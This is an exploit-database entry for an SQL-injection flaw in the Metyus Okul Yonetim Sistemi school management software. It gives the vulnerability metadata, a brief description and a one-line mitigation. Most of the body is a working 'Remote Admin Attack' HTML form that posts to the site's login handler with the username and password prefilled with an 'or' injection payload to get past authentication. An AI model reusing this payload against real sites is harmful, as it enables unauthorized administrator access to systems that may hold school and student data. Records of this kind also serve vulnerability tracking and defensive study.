Remote Admin Attack - LiderHack.Org // Hacking & Security PortaL

vendor:

Okul Yonetim Sistemi

by:

ShaFuck31

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Okul Yonetim Sistemi

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Unknown

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unknown

Unknown

Remote Admin Attack – LiderHack.Org // Hacking & Security PortaL

Metyus Okul Yonetim Sistemi is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation and proper sanitization of user-supplied data should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21418/info

Metyus Okul Yonetim Sistemi is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. 

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

<title>Remote Admin Attack - LiderHack.Org // Hacking & Security PortaL</title> <center>ShaFuck31 - LiderHack.Org</center> <FORM NAME=giris ACTION="http://victim.com/[path to script]/uye_giris_islem.asp" METHOD=post> <table align=center> <td>Kullanici Adi:</td><td><INPUT NAME=kullanici_ismi class="input" value="'or'" SIZE=15></td> </tr><tr> <td>Sifre:</td><td><INPUT NAME=sifre TYPE=text class="input" value="'or'" SIZE=15></td> </tr><tr> <td align=center colspan=2><BUTTON class="input" TYPE=submit>Giris</BUTTON></td> </tr></table></form>